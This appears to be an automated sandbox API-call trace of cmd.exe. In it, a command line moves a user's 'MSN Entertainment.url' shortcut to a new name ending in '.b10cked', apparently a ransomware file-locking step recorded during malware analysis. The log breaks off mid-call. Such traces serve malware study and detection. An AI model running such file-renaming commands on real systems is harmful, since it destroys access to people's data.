[0215.100] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.100] __set_app_type (_Type=0x1) [0215.100] __p__fmode () returned 0x76b331f4 [0215.100] __p__commode () returned 0x76b331fc [0215.100] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.100] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.101] GetCurrentThreadId () returned 0xe40 [0215.101] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe40) returned 0x38 [0215.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.101] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.101] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.115] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fcac | out: phkResult=0x14fcac*=0x0) returned 0x2 [0215.116] VirtualQuery (in: lpAddress=0x14fce3, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.116] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc7c, dwLength=0x1c | out: lpBuffer=0x14fc7c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.116] GetConsoleOutputCP () returned 0x1b5 [0215.126] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.126] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.127] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.127] GetEnvironmentStringsW () returned 0x2c01b0* [0215.128] FreeEnvironmentStringsW (penv=0x2c01b0) returned 1 [0215.128] GetEnvironmentStringsW () returned 0x2c01b0* [0215.128] FreeEnvironmentStringsW (penv=0x2c01b0) returned 1 [0215.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec1c | out: phkResult=0x14ec1c*=0x40) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0xe8, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x0, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegCloseKey (hKey=0x40) returned 0x0 [0215.128] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec1c | out: phkResult=0x14ec1c*=0x40) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x40, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x1, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x0, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x4, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x4) returned 0x0 [0215.128] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ec24, lpData=0x14ec28, lpcbData=0x14ec20*=0x1000 | out: lpType=0x14ec24*=0x0, lpData=0x14ec28*=0x9, lpcbData=0x14ec20*=0x1000) returned 0x2 [0215.128] RegCloseKey (hKey=0x40) returned 0x0 [0215.128] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.128] srand (_Seed=0x5b8863b1) [0215.128] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" [0215.128] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"" [0215.129] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.129] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.129] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.129] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.129] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.129] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.129] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.129] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.129] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.129] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.129] GetEnvironmentStringsW () returned 0x2c2300* [0215.130] FreeEnvironmentStringsW (penv=0x2c2300) returned 1 [0215.130] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.130] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.130] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.130] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.130] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.130] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.130] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.130] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.130] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.130] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f9e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.130] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f9e8, lpFilePart=0x14f9e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f9e4*="Desktop") returned 0x18 [0215.130] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.130] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f764 | out: lpFindFileData=0x14f764) returned 0x2c0040 [0215.130] FindClose (in: hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.131] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.131] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.131] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.131] GetEnvironmentStringsW () returned 0x2c2b20* [0215.131] FreeEnvironmentStringsW (penv=0x2c2b20) returned 1 [0215.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.131] GetConsoleOutputCP () returned 0x1b5 [0215.131] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.131] GetUserDefaultLCID () returned 0x409 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fb28, cchData=128 | out: lpLCData="0") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fb28, cchData=128 | out: lpLCData="0") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fb28, cchData=128 | out: lpLCData="1") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.132] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.134] GetConsoleTitleW (in: lpConsoleTitle=0x2b0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.134] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.135] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.135] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.135] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.135] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.135] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.135] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.135] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.138] GetConsoleTitleW (in: lpConsoleTitle=0x14f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.138] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.138] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.138] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.138] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.138] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.138] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.138] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.138] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.138] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.138] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.138] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.138] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.138] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.139] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.139] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.139] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.139] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.139] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.139] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.139] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.140] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.140] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.140] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f5dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f5d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f5d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.141] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.141] _wcsicmp (_String1="MSNENT~1.URL", _String2=".") returned 63 [0215.141] _wcsicmp (_String1="MSNENT~1.URL", _String2="..") returned 63 [0215.142] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnent~1.url")) returned 0x20 [0215.142] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", nBufferLength=0x104, lpBuffer=0x14ef64, lpFilePart=0x14ef4c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", lpFilePart=0x14ef4c*="MSNENT~1.URL") returned 0x2f [0215.142] SetErrorMode (uMode=0x0) returned 0x1 [0215.142] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.142] _wcsicmp (_String1="MSNENT~1.URL", _String2=".") returned 63 [0215.142] _wcsicmp (_String1="MSNENT~1.URL", _String2="..") returned 63 [0215.142] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnent~1.url")) returned 0x20 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", nBufferLength=0x104, lpBuffer=0x14f3e0, lpFilePart=0x14f178 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", lpFilePart=0x14f178*="MSNENT~1.URL") returned 0x2f [0215.142] SetErrorMode (uMode=0x0) returned 0x1 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", nBufferLength=0x104, lpBuffer=0x14f5e8, lpFilePart=0x14f178 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", lpFilePart=0x14f178*="MSN Entertainment.url.b10cked") returned 0x40 [0215.143] SetErrorMode (uMode=0x0) returned 0x1 [0215.143] SetLastError (dwErrCode=0x0) [0215.143] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url.b10cked")) returned 0xffffffff [0215.143] GetLastError () returned 0x2 [0215.143] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x2b0ef0 [0215.143] FindNextFileW (in: hFindFile=0x2b0ef0, lpFindFileData=0x14eaf4 | out: lpFindFileData=0x14eaf4) returned 0 [0215.143] GetLastError () returned 0x12 [0215.143] FindClose (in: hFindFile=0x2b0ef0 | out: hFindFile=0x2b0ef0) returned 1 [0215.144] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2c1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1c30) returned 0x2b0ef0 [0215.144] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", lpFilePart=0x0) returned 0x40 [0215.144] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url", lpFilePart=0x0) returned 0x38 [0215.144] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url")) returned 0x20 [0215.144] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url" (normalized: 